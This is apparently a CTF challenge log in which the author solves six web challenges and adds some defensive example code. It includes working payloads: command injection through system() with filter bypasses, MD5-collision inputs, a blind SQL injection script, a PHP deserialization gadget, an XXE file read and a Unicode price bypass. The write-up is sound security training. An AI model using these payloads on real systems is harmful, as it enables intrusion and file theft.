[BUUCTF] Challenge log 6
[WUSTCTF2020]朴实无华
- Directory scanning
- Bypassing intval() with scientific notation
- A value that equals its own MD5 hash
Straight to directory scanning; it turned up fl4g.php:
```php
<?php
if (isset($_GET['num'])) {
    $num = $_GET['num'];
    if (intval($num) < 2020 && intval($num + 1) > 2021) {
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    } else {
        die("金钱解决不了穷人的本质问题");
    }
} else {
    die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])) {
    $md5 = $_GET['md5'];
    if ($md5 == md5($md5))
        echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
    else
        die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
} else {
    die("去非洲吧");
}
//get flag
if (isset($_GET['get_flag'])) {
    $get_flag = $_GET['get_flag'];
    if (!strstr($get_flag, " ")) {
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    } else {
        die("快到非洲了");
    }
} else {
    die("去非洲吧");
}
?>
```
Level 1: use scientific notation, 2e4; when 2e4+1 is evaluated it turns into 2e41, which gets past the second comparison.
Level 2: `$md5==md5($md5)` means the value has to equal its own MD5 hash. I have met this before; the value used is 0e215962017.
Level 3: the first if must not see a space, which %09 (a tab) gets around; after that there is a str_ireplace() that rewrites cat, so tac works instead.
/fl4g.php/?num=2e4&md5=0e215962017&get_flag=tac%09fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag
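Why level 2 is satisfiable at all is worth seeing in code. The block below is an added example, not part of the original writeup: it models PHP's loose `==` on numeric strings (any string of the form `0e<digits>` is the number 0, so two different such strings compare equal) and contrasts it with the strict `===` form that does not coerce. The candidate list is constructed for the demonstration.

```python
import hashlib
import re

# PHP's loose == compares two numeric strings as numbers.  "0e<digits>" is
# numeric with the value 0 * 10^n == 0, so two different "0e..." strings
# compare equal.  This is a model of that rule, not PHP itself.
ZERO_E = re.compile(r"0e[0-9]+")


def is_php_zero_e(s: str) -> bool:
    """True when PHP reads s as the numeric string 0e<digits>, i.e. the number 0."""
    return ZERO_E.fullmatch(s) is not None


def loose_equals_own_md5(value: str) -> bool:
    """Model of $value == md5($value).

    Simplification: the only realistic way for a 32-character hex digest to be
    a numeric string is the 0e<digits> form, so both sides must take that form.
    """
    digest = hashlib.md5(value.encode()).hexdigest()
    return is_php_zero_e(value) and is_php_zero_e(digest)


def strict_equals_own_md5(value: str) -> bool:
    """Model of $value === md5($value): identical strings only, no coercion."""
    return value == hashlib.md5(value.encode()).hexdigest()


def magic_inputs(candidates):
    """Filter a list of inputs down to those that pass the loose check."""
    return [c for c in candidates if loose_equals_own_md5(c)]


if __name__ == "__main__":
    # Constructed sample inputs: the writeup's value plus two decoys.  Note that
    # "240610708" hashes to a 0e... digest but is itself not 0e-form, so it
    # only helps against md5($a) == md5($b) checks, not against this one.
    sample = ["password", "0e215962017", "240610708"]
    print(magic_inputs(sample))
```

The strict check never passes for the same inputs, which is why a server-side comparison of hashes should use `===` (or `hash_equals`) rather than `==`.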
[安洵杯 2019]easy_web
- Working out the encoding
- Guessing at an include
- Bypassing an md5 === comparison after a forced string cast
There is a hidden font element on the page.
Directory scanning turned up nothing.
The URL carries a cmd parameter.
It seems most commands are filtered. Looking at the encoded value in front of it, I tried decoding it to work out how it was produced, and it actually came apart: base64 twice, then hex to string.
Encode with CyberChef and include index.php.
Source obtained:
```php
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}
?>
```
The main point is the md5 bypass: after the forced string cast, the array trick no longer works.
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b']))
Found a payload online (two POST fields, a and b):
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
ls is filtered; an alternative:
- dir
cat is filtered; there are several ways around it:
- ca\t
- sort
- uniq
[BJDCTF 2nd]简单注入
- Boolean-based blind injection
- Writing a binary-search script
hint.txt gives the SQL statement:
select * from users where username='$_POST["username"]' and password='$_POST["password"]';
Presumably the username and password have to be brute-forced.
Quotes are filtered; try escaping the quote with \:
username=1\
password=or 1>0#
The response changed.
Time for a script.
Boolean-based blind injection using binary search:
```python
import requests

url = ".php"   # target URL elided in the original
msg = ""
for x in range(1, 50):            # x: character position in the password
    hi = 127                      # upper bound for the character's ASCII value
    lo = 0                        # lower bound
    for y in range(127):
        s = int((hi + lo) / 2)
        # "1\" escapes the closing quote after username, so the password
        # field continues the query as: ... or (ascii(substr(password,x,1)))>s#
        data = {
            'username': '1\\',
            'password': 'or (ascii(substr(password,{},1)))>{}#'.format(x, s)
        }
        res = requests.post(url=url, data=data).text
        if 'stronger' in res:     # condition held: the character is greater than s
            lo = s
        else:
            hi = s
        if (hi - lo) <= 1:        # bounds have converged on the character
            msg += chr(hi)
            print(msg)
            break
```
username=admin
password=OhyOuFOuNdit
[网鼎杯 2020 朱雀组]phpweb
- Building up a stock of PHP functions
- Deserialization
- Using the find command
Opening the page, it redirects. Swapping date for another function, echo, returned call_user_func().
Using the system function gets detected.
Directory scanning gave nothing either.
To pull out the contents of index.php, file_get_contents works, and so does highlight_file:
- file_get_contents
- highlight_file
Source obtained:
```php
<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");

function gettime($func, $p) {
    $result = call_user_func($func, $p);
    $a = gettype($result);
    if ($a == "string") {
        return $result;
    } else {
        return "";
    }
}

class Test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}

$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
    $func = strtolower($func);
    if (!in_array($func, $disable_fun)) {
        echo gettime($func, $p);
    } else {
        die("Hacker...");
    }
}
?>
```
The system function is filtered, so it cannot be passed in the func parameter; instead, use the class and deserialize an object:
```php
<?php
// Payload generator. Only the property values matter to serialize(); the
// __destruct() that ends up calling gettime("system", "ls /") is the one in
// the server's own Test class, so it is left out here.
class Test {
    var $p = "ls /";
    var $func = "system";
}
$data = new Test;
echo serialize($data);
```
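The serialized string itself never appears in the writeup, so the block below builds it in Python to show exactly what the server unserializes, and pairs it with a cheap detection check for serialized objects arriving in request parameters. This is an added example, not from the original post; the serializer covers only strings and objects, which is all the Test class needs.

```python
import re


def php_serialize(value) -> str:
    """Minimal PHP serialize() for str values and for objects given as
    (class_name, {prop: value}); not a full implementation."""
    if isinstance(value, str):
        raw = value.encode("utf-8")
        return 's:%d:"%s";' % (len(raw), value)       # PHP counts bytes, not chars
    if isinstance(value, tuple) and len(value) == 2:
        cls, props = value
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in props.items())
        return 'O:%d:"%s":%d:{%s}' % (len(cls), cls, len(props), body)
    raise TypeError("unsupported value: %r" % (value,))


def build_test_object(func: str, p: str) -> str:
    """Serialized Test object; its two public properties in declaration order (p, func)."""
    return php_serialize(("Test", {"p": p, "func": func}))


# A serialized PHP object always starts with O:<len>:"<class>":<count>:{
PHP_OBJECT = re.compile(r'O:\d+:"[A-Za-z_\\][A-Za-z0-9_\\]*":\d+:\{')


def contains_php_object(param: str) -> bool:
    """True when a request parameter carries a serialized PHP object: an
    inexpensive indicator to log or block when unserialize() is reachable."""
    return PHP_OBJECT.search(param) is not None


if __name__ == "__main__":
    print(build_test_object("system", "ls /"))
    print(build_test_object("date", "Y-m-d h:i:s a"))   # the class's harmless defaults
```

On the server side the durable fix is not a longer blocklist but `unserialize($p, ['allowed_classes' => false])`, or not exposing unserialize to request data at all.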
The flag is not in / after all.
Search for it with find:
find / -name flag*
Sure enough.
[NCTF2019]Fake XML cookbook
- XXE
My first XXE challenge.
An introductory article is attached (.html).
Capturing the request shows the data inside.
payload:
```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [<!ENTITY admin SYSTEM "file:///flag">]>
<user><username>&admin;</username><password>123456</password></user>
```
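What the payload relies on is the inline DTD declaring an external (`SYSTEM`) entity that the parser then expands into the username field. The block below is an added example, not from the original post: it lists the external entities a request body declares, applies the usual hardening rule (refuse any document with a DOCTYPE before it reaches a parser), and only parses bodies that pass. The payload above is embedded as the test input alongside a constructed benign request.

```python
import re
import xml.etree.ElementTree as ET

# The writeup's payload, used here as the malicious sample.
XXE_PAYLOAD = (
    '<?xml version="1.0" encoding="utf-8"?>\n'
    '<!DOCTYPE note [<!ENTITY admin SYSTEM "file:///flag">]>\n'
    '<user><username>&admin;</username><password>123456</password></user>'
)
# Constructed benign request of the same shape.
BENIGN_BODY = '<?xml version="1.0"?><user><username>alice</username><password>123456</password></user>'

EXTERNAL_ENTITY = re.compile(r'<!ENTITY\s+(?:%\s*)?(\w+)\s+(?:SYSTEM|PUBLIC)\b', re.IGNORECASE)
DOCTYPE = re.compile(r'<!DOCTYPE\b', re.IGNORECASE)


def external_entities(body: str) -> list:
    """Names of SYSTEM/PUBLIC entities declared in an inline DTD (empty if none).
    Useful for logging: it names exactly what an attacker asked the parser to fetch."""
    return EXTERNAL_ENTITY.findall(body)


def accepts(body: str) -> bool:
    """Hardening rule: no DOCTYPE at all.  Untrusted request bodies never need one,
    and refusing it removes external entities, parameter entities and entity
    expansion attacks in one go."""
    return DOCTYPE.search(body) is None


def username_from_request(body: str):
    """Parse only after the DOCTYPE check passes; None means the body was rejected."""
    if not accepts(body):
        return None
    return ET.fromstring(body).findtext("username")


if __name__ == "__main__":
    print("declared external entities:", external_entities(XXE_PAYLOAD))
    print("payload accepted:", accepts(XXE_PAYLOAD))
    print("benign username:", username_from_request(BENIGN_BODY))
```

The regex checks are a pre-filter, not a parser; the real guarantee comes from the parser configuration (external entity loading disabled), with the DOCTYPE refusal in front of it as defence in depth.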
[ASIS 2019]Unicorn shop
- Unicode encoding vulnerability
Presumably buying the last unicorn gets the flag.
But entering 1337 gives an error saying only one character is allowed.
So find a character whose numeric value is greater than 1337.
Search "thousand" and pick any character worth more than 1337.
payload:
id=4&price=%E2%86%82
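The block below is an added example, not from the original post. It assumes the shop converts the price with a Unicode-aware numeric parser such as Python's `unicodedata.numeric()` (the writeup does not say which parser is used); under that assumption the single character in the payload, `%E2%86%82` (U+2182, ROMAN NUMERAL TEN THOUSAND), evaluates to 10000. It also shows a hardened parser and the caveat that `int()` on its own is not strict enough, because it accepts decimal digits from other scripts.

```python
import unicodedata
from urllib.parse import unquote


def lenient_price(s: str) -> float:
    """Model of the assumed server behaviour: one character, any Unicode numeric value."""
    if len(s) != 1:
        raise ValueError("only one character allowed")
    return unicodedata.numeric(s)   # ValueError if the character has no numeric value


def strict_price(s: str) -> int:
    """Hardened parse: ASCII decimal digits only.  int() alone is not enough:
    it accepts other scripts' digits too, e.g. int("\u0661") == 1 (Arabic-Indic one)."""
    if not (s.isascii() and s.isdigit()):
        raise ValueError("price must be ASCII digits")
    return int(s)


def strict_rejects(s: str) -> bool:
    """True when the hardened parser refuses the input."""
    try:
        strict_price(s)
    except ValueError:
        return True
    return False


def decoded_payload_char() -> str:
    """The writeup's price=%E2%86%82, percent-decoded."""
    return unquote("%E2%86%82")


if __name__ == "__main__":
    c = decoded_payload_char()
    print(repr(c), unicodedata.name(c), "->", lenient_price(c))
    print("strict parser rejects it:", strict_rejects(c))
```

The general lesson is that "is this a number" and "is this the number I expect" are different questions: a numeric-value lookup answers the first for thousands of code points, so a price field should be matched against the exact ASCII digit syntax before any conversion.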